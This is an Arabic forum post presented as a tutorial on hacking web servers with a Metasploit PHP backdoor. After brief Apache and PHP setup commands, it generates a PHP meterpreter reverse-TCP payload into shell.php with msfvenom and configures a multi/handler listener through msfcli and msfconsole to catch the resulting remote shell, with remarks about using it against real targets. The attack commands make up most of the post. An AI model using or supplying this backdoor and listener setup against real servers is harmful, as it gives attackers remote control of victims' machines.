عرض مشاركة واحدة
قديم 12-04-2013, 09:43 PM   رقم المشاركة : 1 (permalink)
معلومات العضو
fantome195
 
الصورة الرمزية fantome195
 

 

 
إحصائية العضو








fantome195 غير متواجد حالياً

إرسال رسالة عبر MSN إلى fantome195

 

 

إحصائية الترشيح

عدد النقاط : 12
fantome195 is on a distinguished road

.... أختراق خوادم الويب من خلال باكدور ميتاسبوليت PHP


كيفكم حبآيبي ان شاء الله الجميع بخير وفي صحة وعافية


اليوم باذن الله راح نتكلم عن أختراق خوادم الويب من خلال باكدور ميتاسبوليت PHP






مستلزمات لتطبيق على جهازك :



Apache2

Php shell

Metasploit



امر تنصيب Apache :



sudo apt-get install apache2

لقرائة PHP على السرفر :

sudo apt-get install libapache2-mod-php5


تصريح ملف PHP :

chmod 644 file.php


الأن نمر مباشرة الى تريمنال ونكتب امر تالي


msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.1.11 LPORT=81 -f raw > shell.php


شرح اوامر :

P: تعني بايلود
LHOST : عنوان ايبي الخاص بك سواء الخارجي او داخلي
LPORT: بورت الذي ستصل عليه البايلود
F Raw : Format Raw


البايلود الذي اخترناه بعد استغلال يقوم باتصال بجهازنا على بورت المحدد فوق ,




ملاحظة : يجب اظافة وسوم بي اتش بي للباكدور RAW FORMAT

<? php ?>




وبعدها نكتب امر تالي :


msfcli exploit/multi/handler LHOST=192.168.1.11 LPORT=81 PAYLOAD=php/meterpreter_reverse_tcp E


E: exploit


طيب امر واضح شغلنا سكريبت msfcli لتسريع امر شوي طبعا هذا السكريبت يستعمل عموما في عمل شروحات يعني


غير صالح لو حبيت تخترق حقيقة الهدف ,,, ﻻزمك تفتح تريمنال.


لذلك في حالة وجود المشاكيل نقوم بانتقال الى طريقة المعتادة




msfconsole

use multi/handler

set payload php/meterpreter_reverse_tcp

set lhost 192.168.1.11

set lport 81


exploit






الفديو





Hojvhr o,h]l hg,df lk oghg fh;],v ldjhsf,gdj PHP

التوقيع

 

   

رد مع اقتباس